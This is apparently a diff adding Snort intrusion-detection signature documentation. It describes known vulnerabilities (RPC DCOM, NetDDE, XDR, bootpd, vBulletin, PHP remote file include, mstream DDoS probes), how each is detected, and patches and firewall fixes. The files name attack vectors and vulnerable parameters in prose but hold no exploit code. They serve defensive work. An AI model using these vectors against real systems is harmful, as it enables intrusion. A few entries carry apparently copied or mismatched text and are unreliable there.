+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2931.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2931
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/392.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+392
+
+--
+
+Summary:
+This event is generated when an ICMP Datagram Conversion Error message is detected on the network.  ICMP Datagram Conversion Error messages were developed with the introduction of IPv6 to give information about invalid datagram conversions between IPv4 and IPv6.
+
+--
+
+Impact:
+No known attack vectors are known that use ICMP type 31 datagrams.  This is purely an informational message that detects errors on the network.
+
+--
+
+Detailed Information:
+ICMP Type 31 was developed to return information about datagram conversion errors between IPv4 and IPv6 as data is converted between them.  
+
+--
+
+Attack Scenarios:
+None known
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Datagram Conversion Error messages.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 31 datagrams should be blocked at the firewall.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2092.txt
@@ -0,0 +1,86 @@
+Rule:
+
+--
+Sid:
+2092
+
+--
+Summary:
+vulnerability in xdrmem_getbytes used by XDR in RPC portmap services.
+
+--
+Impact:
+System compromise, denial of service, execution of arbitrary code, 
+information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in various implementations of external data 
+representation (XDR) libraries. An integer overflow in a component 
+(xdrmem_getbytes) used by XDR can lead to a buffer overflow.
+
+The XDR libraries are widely used by multiple vendors to provide a 
+framework for data transmission across networks. This is most commonly 
+used in RPC implementations.
+
+A specially crafted rpc request can lead to remote system compromise and
+super user access to the target host. Additionally, a denial of service 
+and execution of arbitrary code with the privilege of the super user is 
+also possible.
+
+--
+Affected Systems:
+Multiple vendors including all those using:
+	Sun Microsystems Network Services Library (libnsl)
+	GNU C library with sunrpc (glibc)
+	BSD-derived libraries with XDR/RPC routines (libc)
+
+--
+Attack Scenarios:
+The attacker needs to send a specially crafted rpc request to the target
+host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade the vendor libraries to the latest non-affected versions. Any 
+statically linked binaries and applications must be recompiled and 
+restarted after the upgrade.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7123
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0028
+
+CERT:
+http://www.cert.org/advisories/CA-2003-10.html
+http://www.kb.cert.org/vuls/id/516825
+http://www.kb.cert.org/vuls/id/192995
+
+--
--- /dev/null
+++ b/doc/signatures/100000443.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000443
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiraksGalerie" application running on a webserver. Access to the file "galimage.lib.php" using a remote file being passed as the "listconfigfile[0]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "listconfigfile[0]" parameter in the "galimage.lib.php" script used by the "MiraksGalerie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiraksGalerie
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1736.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1736
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1906.txt
@@ -0,0 +1,68 @@
+Rule:
+--
+Sid:
+1906
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) amd service.
+
+--
+Impact:
+Remote root access. This attack can permit execution of arbitrary
+commands with the privileges of the user running amd, typically root.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts. The
+amd service automatically mounts and unmounts requested file systems.
+There is a buffer overflow associated with amd logging that can allow
+execution of arbitrary commands with the privileges of the user running
+amd, typically root.
+
+--
+Affected Systems:
+	BSDI BSD/OS 3.1, 4.0.1
+	FreeBSD 3.0, 3.1, 3.2
+	Red Hat Linux 4.2, 5.0, 5.1, 5.2, 6.0
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where amd runs
+and then attack the amd port. Alternatively, an attacker may attempt to
+execute the exploit code on any listening port in the RPC range if the
+portmapper is blocked. 
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1742.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1742
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3425.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3425
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2292.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2292
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000117.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 
+100000117
+
+-- 
+Summary: 
+This event is generated when an attempt is made to execute arbitrary commands 
+on a web server via the VBulliten system.
+
+-- 
+
+Impact: 
+Attackers may execute arbitrary code of their choosing with the privileges of 
+the affected script.
+
+--
+Detailed Information:
+The "comma" parameter of VBulliten's "forumdisplay.php" script is not 
+sufficiently santitized, and will allow users to run arbitrary commands with 
+the privileges of the affected script on the host system when the 
+"showforumusers" option has been enabled by the system administrator.
+
+--
+Affected Systems:
+VBulletin 3.0
+VBulletin 3.0 Beta 2
+VBulletin 3.0 Beta 3
+VBulletin 3.0 Beta 4
+VBulletin 3.0 Beta 5
+VBulletin 3.0 Beta 6
+VBulletin 3.0 Beta 7
+VBulletin 3.0 Gamma
+VBulletin 3.0.1
+VBulletin 3.0.2
+VBulletin 3.0.3
+VBulletin 3.0.4
+
+--
+
+Attack Scenarios: 
+A web browser or an automated script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+It has been reported that VBulliten versions 3.0.5 and above are not 
+vulnerable. Additionally, administrators may disable the "showforumusers" 
+configuration option as a workaround.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.vbulletin.com/
+
+--
--- /dev/null
+++ b/doc/signatures/245.txt
@@ -0,0 +1,58 @@
+Rule:
+--
+Sid:
+245
+
+--
+Summary:
+This event is generated when an mstream handler attempts to identify active agents.
+
+--
+Impact:
+Severe. If the listed source IP is in your network, it may be an mstream handler.  If the listed destination IP is in your network, it may be an mstream agent.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  A handler can probe to see if an agent is active by sending it a UDP packet to destination port 10498 with a string of "ping" in the payload. 
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+A mstream handler may probe to see if an agent is active.
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known handler-to-agent ports in addition to  10498.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
--- /dev/null
+++ b/doc/signatures/3334.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3334
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1171.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+Sid:
+1171
+
+--
+
+Summary:
+This event is generated when an attempt is made to evade an
+IDS in a possible web attack by sending an obfuscated request 
+using HEAD.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+Some CGI attacks can be accomplished by using HEAD instead of GET.
+This method can be used by an attacker to obfuscate attacks or
+reconnaissance in an attempt to evade IDS systems.
+
+--
+Affected Systems:
+	All systems running a web server.
+ 
+--
+Attack Scenarios:
+An attacker runs an automated tool, like Whisker, or sends a hand-crafted
+attack to a web server
+
+--
+Ease of Attack:
+Simple. Automated tools are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to determine what kind of attack or probe was launched.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2054.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2054
+
+--
+Summary:
+Versions of the software tracking system Bugzilla prior to 2.14.1 are 
+prone to a vulnerability that allows some degree of account hijacking.
+
+--
+Impact:
+False data may be represented in the bug tracking database.
+
+--
+Detailed Information:
+Versions of Bugzilla prior to 2.14.1 and cvs version 2.15 prior to 
+20020103 allow non-authorized users to post comments as any user of 
+their choosing, including non-valid usernames.
+
+A check to verify the user is valid when posting comments is not 
+performed correctly. Using this an attacker might post comments as 
+another user in the bugzilla database.
+
+--
+Affected Systems:
+Bugzilla versions prior to 2.14.1 and cvs versions prior to 2.15 (cvs20020103)
+
+--
+Attack Scenarios:
+The attacker can manually edit the page to pass his own version of 
+variables to the script handling the comments. This script in turn 
+passes the data directly to another script that handles the posting of 
+bugs without checking the user database.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Bugzilla to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0008
+
+Bugzilla:
+http://www.bugzilla.org/security/2.14.1/
+http://bugzilla.mozilla.org/show_bug.cgi?id=108385
+http://bugzilla.mozilla.org/show_bug.cgi?id=108516
+
+--
--- /dev/null
+++ b/doc/signatures/319.txt
@@ -0,0 +1,64 @@
+SID:
+319
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attempt is made to exploit a vulnerable 
+version of bootpd
+--
+
+Impact:
+If attack is successful, total system compromise from a remote attacker
+--
+
+Detailed Information:
+Due to improper handling of bounds checking in bootp request packets 
+Bootpd version 2.4.3(and earlier) is susceptible to several types of 
+buffer overflows. A successful exploit will result in complete 
+compromise of the attacked system. Any system running Bootpd version 
+Stanford University bootpd 2.4.3 should consider themselves vulnerable
+--
+
+Affected Systems:
+	Debian Linux 1.1 
+	Debian Linux 1.2 
+	Debian Linux 1.3 
+	Debian Linux 1.3.1 
+	Debian Linux 2.0 
+	Stanford University bootpd 2.4.3
+--
+
+Attack Scenarios:
+An attacker can exploit vulnerable bootpd servers and modify system 
+files as the root user or create a shell with root privileges
+--
+
+Ease of Attack:
+Simple, Sample code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have supplied patched versions of bootpd, upgrade
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/111-2.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+111-2
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. Possible attempt to close a session by a third party.
+
+--
+Detailed Information:
+This event indicates that the pre-processor stream4 has detected an out
+of sequence packet with the RST flag set or a packet without the
+required RST and ACK flags in a TCP session. This is abnormal behavior
+and may constitute an attack or be an indicator of spurious activity on
+a network.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may inject packets with the RST flag set into a session in
+an attempt to close the session and cause a Denial of Service (DoS)
+between server and client. This technique may also be used in session
+hijacking attempts.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1566.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1566
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2374.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2374
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with Mollensoft Hyperion FTP/Encladus Server Suite NLST 
+command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists 
+with the NLST command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the NLST 
+command.
+
+--
+Affected Systems:
+	Mollensoft Software Enceladus Server Suite 3.9.11
+	Mollensoft Software Hyperion FTP Server 3.5.2
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the NLST 
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000104.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000104
+
+-- 
+Summary: 
+This event is generated when an empty UDP packet is sent to port 27777, where 
+Amp II 3D game servers typically listen.
+
+-- 
+
+Impact: 
+After receiving such a packet, the server will fall into an infinite loop, 
+potentially consuming all resources on the host system. The administrator will 
+need to restart the game server, and possibly the host system.
+
+--
+Detailed Information:
+Amp II 3D servers listen to UDP port 27777 for commands. Upon receiving an 
+empty UDP packet to that port, the server falls into an infinite loop, possibly 
+consuming all resources on the host system. The administrator must restart the 
+game server and/or the host system.
+
+--
+Affected Systems:
+Amp II 3D Game Engine
+Amp Gore: Ultimate Soldier 1.50
+
+--
+
+Attack Scenarios: 
+A script that generates empty UDP packets can be used to perform this attack.
+
+-- 
+
+Ease of Attack: 
+Simple; public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+No known patches or workarounds exist. System administrators may be able to 
+reject these packets at their firewall, depending upon the abilities of the 
+firewall system they use.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/119-4.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+119-4
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+Microsoft IIS servers are able to use non-ASCII characters as values
+when decoding UTF-8 values. This is non-standard behavior for a
+webserver and violates RFC recommendations. All non-ASCII values should
+be encoded with a %. This event may indicate an attack against a web
+server or at the least an attempt to evade an IDS.
+
+No web clients encode UTF-8 characters in this way. This is most likely
+a malicious request.
+
+--
+Affected Systems:
+	All Microsoft IIS servers
+
+--
+Attack Scenarios: 
+An attacker merely needs to encode a web request using this non-standard
+format.
+
+-- 
+
+Ease of Attack: 
+Simple. Many exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000495.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000495
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Zeroboard" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "$file_name" parameter in the "write_ok.php" 
+script used by the "Zeroboard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Zeroboard
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
